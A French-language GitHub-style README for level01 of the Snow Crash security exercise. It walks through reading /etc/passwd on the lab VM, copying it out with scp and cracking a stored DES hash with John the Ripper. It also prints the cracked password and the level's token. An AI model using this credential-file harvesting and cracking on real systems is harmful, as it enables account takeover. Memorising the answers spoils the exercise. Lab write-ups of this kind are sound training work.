rparodi/snow-crash
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
snow-crash/level01
History
Raphael c103e9ad59
feat(lvl01): adding the flag file
2026-01-26 16:15:23 +01:00
..
ressources feat(lvl01/ressources): adding the passwd files 2026-01-26 16:14:16 +01:00
flag feat(lvl01): adding the flag file 2026-01-26 16:15:23 +01:00
README.md docs(lvl01): adding the readme for level01 2026-01-26 16:14:34 +01:00

README.md

Le mot de passe du compte level01 n'est pas donne mais est bien exitstant

groups level01
level01 : level01 users

En cherchant la connection je regarde sur le fichier system /etc/passwd

Voici uniquement la partie interessante (avec la commande complete)
cat /etc/passwd | sed 's/:/ /g' | awk '{print $1, $2}' | grep '01'
level01 x
flag01 42hDRfypTqqnw

et tombe donc sur un hash de mot de passe dans le fichier /etc/passwd je decide donc le copier avec scp sur mon laptop

scp -P 4242 level00@localhost:/etc/passwd .
	  / ____|                    / ____|             | |
	 | (___  _ __   _____      _| |     _ __ __ _ ___| |__
	  \___ \| '_ \ / _ \ \ /\ / / |    | '__/ _` / __| '_ \
	  ____) | | | | (_) \ V  V /| |____| | | (_| \__ \ | | |
	 |_____/|_| |_|\___/ \_/\_/  \_____|_|  \__,_|___/_| |_|

  Good luck & Have fun

level00@localhost's password:
passwd                                                 100% 2477   597.9KB/s   00:00


ll
Permissions Size User    Date Modified Name
.rw-r--r--@ 2.5k raphael 26 Jan 15:57   passwd

John ne fonctionnant pas sur notre session a cause du flag00 alors nous allons faire utliser sur mon laptop

john ./passwd
Warning: detected hash type "descrypt", but the string is also recognized as "descrypt-opencl"
Use the "--format=descrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 ASIMD])
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Warning: Only 126 candidates buffered for the current salt, minimum 128 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:00 DONE 1/3 (2026-01-26 15:57) 0g/s 70200p/s 70200c/s 70200C/s Flag0168..Flag0159
Proceeding with wordlist:/nix/store/sjnlaf0f50sb5p9l93rvlqfhi7xzjpvm-john-rolling-2404/share/john/password.lst
Enabling duplicate candidate password suppressor
abcdefg          (flag01)
1g 0:00:00:00 DONE 2/3 (2026-01-26 15:57) 33.33g/s 49000p/s 49000c/s 49000C/s raquel..bigman
Use the "--show" option to display all of the cracked passwords reliably
Session completed.


john ./passwd --show
flag01:abcdefg:3001:3001::/home/flag/flag01:/bin/bash

1 password hash cracked, 0 left

Et la connection et maintenant possible et je peux lancer

su flag01
Password:
Don't forget to launch getflag !


getflag
Check flag.Here is your token : f2av5il02puano7naaf6adaaf